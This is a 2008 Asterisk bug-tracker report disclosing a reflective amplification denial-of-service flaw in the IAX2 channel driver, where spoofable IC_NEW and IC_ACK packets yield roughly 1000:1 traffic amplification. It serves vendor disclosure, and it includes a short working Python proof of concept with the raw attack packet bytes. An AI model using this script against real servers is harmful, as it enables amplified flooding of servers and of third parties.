| Summary: | ASTERISK-11880: IC_NEW + IC_ACK recreates reflective amplification DoS | ||
| Reporter: | Joel R. Voss (javantea) | Labels: | |
| Date Opened: | 2008-04-18 13:22:15 | Date Closed: | 2008-04-18 13:24:49 |
| Priority: | Major | Regression? | No |
| Status: | Closed/Complete | Components: | Channels/chan_iax2 |
| Versions: | Frequency of Occurrence | ||
| Related Issues: | |||
| Environment: | Attachments: | ||
| Description: | The original protocol flaw with IC_NEW was documented here. http://bugs.digium.com/view.php?id=10078 IC_NEW creates a new unauthenticated call with servers that allow it. The fix that Asterisk added simply required an IC_ACK which can also be spoofed. I wanted to create a new issue since it isn't exactly the same as the old issue. I released the exploit as a framework here: https://www.altsci.com/concepts/page.php?s=asteri&p=2 I will be speaking at Toorcon Seattle 2008 about this issue. http://seattle.toorcon.org/2008/conference.php?id=12 I was able to cause asterisk to send 8Mbps for 30+ seconds today using this attack without causing any harm to the system. The cost to the attacker is 30kB. This is a 1000:1 amplification. ****** ADDITIONAL INFORMATION ****** Here is a minimal implementation of the attack to show how simple it is (riax2.py): from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM host, port = '192.168.0.3', 4569 s = socket(AF_INET, SOCK_DGRAM) s.connect((host, port)) print 'Connected:', s.getsockname() new_packet = '\x80\xeb\x00\x00\x00\x00\x00\x01\x00\x00\x06\x01\x08\x04\x00\x00\x02\xaa' ack_packet = '\x80\xeb\x00\x00\x00\x00\x00\x0a\x00\x00\x06\x04' s.send(new_packet) a = s.recv(1024) s.send(ack_packet) b = s.recv(1024) | ||
| Comments: | |||